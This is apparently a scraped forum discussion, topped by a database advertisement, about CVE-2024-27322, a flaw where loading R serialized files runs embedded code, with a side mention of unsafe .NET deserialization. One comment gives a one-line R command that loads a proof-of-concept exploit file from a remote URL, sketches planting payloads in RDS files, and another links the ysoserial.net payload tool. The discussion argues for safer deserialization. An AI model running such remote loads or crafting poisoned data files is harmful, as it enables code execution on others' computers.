-
InfluxDB
Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.
Isn't this demonstrably false? I.e. run this [1]
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
and it opens the calculator application on windows/macOS (or echo's 'pwnd' on linux).
To me, if someone can easily cause their code to run on my computer, that's a pretty serious vulnerability. read.csv() or fromJSON() do not allow this.
I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.
FWIW, my recommendation is that CRAN should create a function like readRDS() that only even reads in data and does not allow any extra code to be run, then only allow that on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.
[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...
I was thinking of BinaryFormatter and NetDataContractSerializer, etc. unsafe .NET object deserialization. I don't mean JSON that's right lmao
https://github.com/pwntester/ysoserial.net